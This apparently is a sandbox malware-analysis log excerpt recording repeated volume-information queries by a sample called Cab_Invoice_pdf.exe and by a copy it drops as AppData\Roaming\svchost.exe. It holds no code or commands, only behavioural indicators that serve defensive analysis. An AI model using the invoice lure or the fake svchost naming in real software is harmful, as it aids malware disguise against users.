Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\select.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\pywintypes38.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\_queue.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\unicodedata.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\_hashlib.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\_ssl.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\_bz2.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\_lzma.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\win32gui.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\win32event.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\win32api.pyd VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4y2igpme VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cab_Invoice_pdf.exeQueries volume information: C:\Users\user\Desktop\Cab_Invoice_pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\_ctypes.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\_socket.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\select.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\pywintypes38.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\_queue.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\unicodedata.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\_hashlib.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\_ssl.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\_bz2.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\_lzma.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\win32gui.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\win32event.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI63082\win32api.pyd VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61562\base_library.zip VolumeInformationJump to behavior
